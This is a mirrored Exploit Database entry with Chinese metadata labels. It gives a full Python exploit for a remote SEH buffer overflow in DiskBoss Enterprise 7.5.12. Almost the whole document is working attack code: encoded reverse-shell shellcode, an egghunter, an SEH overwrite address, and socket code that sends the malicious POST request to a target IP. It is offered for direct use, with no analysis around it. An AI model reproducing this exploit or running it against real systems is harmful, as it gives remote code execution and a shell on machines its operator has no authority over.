DiskBoss Enterprise 7.5.12 – ‘POST’ Remote Buffer Overflow (SEH)

• Exploit Database
• 13 阅读

• 作者： Wyndell Bibera
  日期： 2017-01-10
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41003/

• #!/usr/bin/python
   
  # Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
  # Date: 10-01-2017
  # Exploit Author: Wyndell Bibera
  # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
  # Version: 7.5.12
  # Tested on: Windows XP Professional SP3
  
  import socket
  
  ip = "192.168.86.150"
  port = 80
   
  egg = "ezggezgg"
  nopslide = "\x90" * 8
  
  # Bad characters: \x00\x09\x0a\x0d\x20
  # Reverse Shell @ Port 443 - Change shellcode section accordingly
  shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
  "\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
  "\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
  "\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
  "\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
  "\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
  "\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
  "\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
  "\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
  "\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
  "\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
  "\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
  "\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
  "\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
  "\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
  "\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
  "\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
  "\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
  "\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
  "\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
  "\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
  "\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
  "\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
  "\x7e\x97\x50\x56\x7e\xb2")
  scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
  shortjmp = "\xeb\x0f\x90\x90"
  
  # Search for string 'ezgg' twice
  egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
  "\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  
  extra = "\x90" * 9
  pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
  
  # POP POP RET Instruction
  seh = "\x6b\xa6\x02\x10" 
  
  buffer = (
  "POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
  "Host: :192.168.86.150\r\n"
  "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
  "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n\r\n")
   
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((ip, port))
  s.send(buffer)
  s.close()